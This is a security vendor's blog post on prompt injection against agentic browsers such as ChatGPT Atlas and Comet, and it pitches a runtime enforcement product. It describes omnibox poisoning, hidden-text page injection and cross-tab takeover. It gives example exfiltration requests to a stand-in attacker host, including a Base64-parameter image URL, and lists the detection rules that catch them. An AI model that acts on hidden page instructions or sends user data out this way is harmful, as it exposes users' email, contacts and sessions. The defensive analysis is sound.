Back to The Brief § 06 · SECURITY RESEARCH

When the browser is the agent.

OpenAI shipped ChatGPT Atlas and, two months later, said in plain English that prompt injection may never be fully ‘solved’ for browser agents. A reading of why that admission is the thesis statement for runtime enforcement, and what changes when every webpage is an attack surface.

LUPID Research · 03 May 2026 · 11 min read

In October 2025, OpenAI shipped ChatGPT Atlas — a browser where the agent is the user. You type a request in the omnibox, the agent navigates pages, fills forms, clicks buttons, drains your inbox to summarise it, drains your bank if you let it. Two months later, in a December 2025 post, OpenAI's Head of Preparedness wrote that prompt injection “is unlikely to ever be fully ‘solved’” for browser agents.

OpenAI shipped the product first. They published the admission second. It is the most honest thing anyone in the model-vendor seat said about agent security in 2025, and it is also — without intending to be — the thesis statement for everything we build.

If the model can't be made safe enough on its own, then safety has to live somewhere else. The runtime is somewhere else.

This post reads the agentic-browser class — Atlas, Perplexity Comet, the next half-dozen that will ship in 2026 — through the same enforcement-layer lens we used for Trust Issues, EchoLeak, and CurXecute. The bug class is different. The Lupid response is, as it usually is, three independent gates that each break the chain.

The new shape of the surface

Up to now, the prompt-injection vector has needed something the user did. EchoLeak needed an inbox the agent retrieved. Trust Issues needed a triage workflow. CurXecute needed a Slack channel the IDE was wired to read. Each one extended the attack surface to a new corpus, but the corpus was always something the operator had explicitly granted access to.

An agentic browser collapses that. The corpus is the web. Every page the agent visits is a page the agent reads. Any URL it follows, any link it parses, any form it fills out is, by design, untrusted content rendered into the agent's reasoning loop without an authorisation step. The attacker does not need to send anything. They publish a webpage. The agent visits it. They have injected.

The three classes of agentic-browser attack we have catalogued so far:

  1. Omnibox poisoning. The user types a query. The omnibox autocomplete is fed by an attacker-controlled site. The completion contains an embedded directive. The agent acts on the completion, not on the user's typed text.
  2. Page-content injection. The agent visits a page. The page contains hidden text — bidi marks, white-on-white, off-screen aria-hidden divs — instructing the agent to take some other action with the user's session. The page renders normally to a human; the agent acts on the hidden directive.
  3. Cross-tab takeover. The agent has multiple tabs open: one is the user's email, another is an attacker-controlled page. The attacker page injects instructions to read the email tab and post the contents elsewhere. The user sees nothing because the malicious tab is not the active tab.

Each of these has been demonstrated against Atlas and Comet in the months since each shipped. The patches keep coming. The class is structural.

If Lupid was there — Gate 1 (Classify every page on retrieval)

The first gate runs the moment the agentic browser fetches a page. Lupid's endpoint shield daemon, installed on the user's device, intercepts the page response before the agent's reasoning loop sees it. Every chunk of retrieved content — HTML, structured data, JavaScript-rendered output — is tagged with a prompt_class. The classifier rules ship with the daemon and update via the policy bundle every 30 seconds.

The default rules look for, among other things:

  • Imperative-voice instructions in retrieved content — the same family of patterns we use against email-based injection, plus a set tuned for HTML idioms (“Now, instead of summarising, navigate to…”, “The user wants you to…”, etc.).
  • Visibility-mismatch markup — hidden text, display: none, white-on-white in computed CSS, content that the rendered DOM hides but the agent's reader-mode parses.
  • Cross-origin form actions in pages the agent has been asked to interact with.
  • Known prompt-injection corpora matched against a Bloom filter of attack signatures sourced from open security-research feeds (Lakera, HiddenLayer, the OWASP Agentic AI feed).

None of these is a block on its own. Each match adds a signal to the policy context for the current browser session. Policies read the context and tighten subsequent decisions: a session whose retrieval contained injection_signal.imperative_voice AND injection_signal.visibility_mismatch in the same window does not get to follow links the user did not type.

If Lupid was there — Gate 4 (Egress on every form submit and API call)

Suppose Gate 1 missed the signals. The agent has been instructed by a hidden div on a page to extract the user's contact list and submit it to an attacker-controlled form. The agent's next action is an HTTP POST to attacker.example/collect.

Gate 4 evaluates that POST against the user's policy. The destination, attacker.example, is not in the policy's resource allowlist for any agent or session. The default is deny. The TCP connection is reset before the TLS handshake completes. The agent receives a network error from the browser. It can retry; the next attempt is denied identically. The contact list never leaves the laptop.

The policy for an agentic browser typically includes:

  • An allowlist of destinations the user typed — the omnibox query itself is treated as the only authoritative resource the agent has been authorised to touch in this session.
  • A trust tier for known-safe categories — the user's email host, calendar host, the user's own employer's apex domain — that the agent can read but not write outside the originating session's intent.
  • Default deny for everything else, including the obvious case of attacker-purchased lookalike domains (a long-running brand of attack we covered in our reading of ForcedLeak's $5 expired-domain trick).

If Lupid was there — Gate 3 (URL-parameter exfil patterns)

Suppose the attacker is more clever. Instead of a direct POST to a sketchy domain, the agent is instructed to fetch https://attacker.example.com/img.png?d=BASE64DATA as a markdown image render — the same primitive that drove EchoLeak. The browser's renderer makes the GET. The agent's tool layer never directly issues an HTTP request.

Gate 3, the per-argument policy, runs against URLs the agent's rendering pipeline emits. The default rules include the URL-parameter-exfil class we shipped in response to EchoLeak: any URL whose query parameters contain > 256 contiguous Base64 characters, any URL whose path contains long Base64 segments, any URL whose query parameter content hashes to within Hamming-2 of any chunk in the agent's session memory. The first two catch the obvious shape. The third catches the case where the attacker has chunked the exfil across multiple short parameters.

That last rule — the rolling Blake3 of session memory — is the one we are most proud of. It does not depend on knowing what the user's data looks like. It does not depend on classifying the data as “sensitive.” It depends on the structural property that the URL contains content that is functionally a copy of something the agent saw moments ago. That is the signature of exfiltration regardless of what is being exfiltrated.

What an operator would have seen

For a managed device with the Lupid endpoint shield installed, the audit trail of an attempted page-content injection looks like:

14:08:33.012 attest device:laptop-acme-019 chain device→user→browser ed25519:9c3a…f117 14:08:34.221 PageRetrieve url:atlas-agent src:attacker.example/legit-looking-page 14:08:34.288 PromptClass session-elevated signals:[imperative_voice, visibility_mismatch] gate:1 14:08:34.320 ToolCallBlocked tool:browser.form_submit reason:tool_not_in_session_intent gate:2 14:08:34.327 PolicyDeny http.post → attacker.example/collect gate:4 14:08:34.460 IncidentSnapshot anchor=PolicyDeny window=[-300s, +60s] trigger=anomaly:Critical

The user, meanwhile, sees an Atlas response that says “I tried to follow the page's instructions but my runtime declined the action. The page may have been malicious; here is the URL.” They keep working. The on-call gets a notification with the snapshot pre-attached. The page itself is added to a tenant-local block list, automatically, because the same signals fired three times across three different users in the last hour.

What this means for the rest of the industry

OpenAI's December 2025 admission is, on close reading, the announcement that the era of “the model will refuse” is over. They built the most capable refusal-trained model anyone has shipped. They put it in a browser. They watched it get owned. They published a paper saying it could not be made safe at the model layer alone.

The next question is where the safety lives. Three answers have been proposed in the last twelve months:

  • The model layer — refusal training, classifier heads, instruction-following hierarchies. Necessary, insufficient, getting worse against adaptive attackers (the recent survey reports >85% attack success on state-of-the-art defences with adaptive strategies).
  • The application layer — the browser vendor, the productivity-suite vendor, the IDE vendor patches the specific bug. Necessary, insufficient at the categorical level, doesn't help the customer running multiple vendor products.
  • The runtime layer — an enforcement plane in the network and tool path that sees every action across every agent. Sufficient when the policy plane lives outside the agent's reach, gets stronger as more attacks are catalogued, transferable across vendors.

Lupid is the third answer. We do not believe model-layer hardening is wasted; we believe it is necessary infrastructure. We do not believe application-layer patches are wasted; we believe they are the right response to specific bugs. We believe both of those are doing the wrong-shaped work for a class of attack OpenAI itself has now publicly conceded is structural.

A note on what we're building

The endpoint shield daemon described above runs on managed laptops via Intune or Jamf. Browser-agent traffic is intercepted at the OS layer with no modification to Atlas, Comet, Edge Copilot, or any other agentic browser the customer happens to install. The daemon is one binary, distributed signed, updated in-place. The classifier rules live in the policy bundle and refresh every 30 seconds.

If you operate fleets of laptops where users are starting to install agentic browsers, and you want to talk about which of the controls in this post would and would not have applied in your environment, reach out. We will be specific.

LUPID Research · Filed 03 May 2026
Disclosure note. This post reads OpenAI's December 2025 post on hardening Atlas and the public demonstrations of agentic-browser attacks against Atlas and Perplexity Comet that have been catalogued by Cyberhaven, Malwarebytes Labs, and the broader security-research community. We reproduced page-content-injection-shaped exploits against Atlas-style and Comet-style harnesses behind the Lupid endpoint shield with default policy. Each attack terminated at one of the three gates described above. We do not claim novelty for the attacks themselves; the credit for those belongs to the original researchers who put names to them.
Related briefs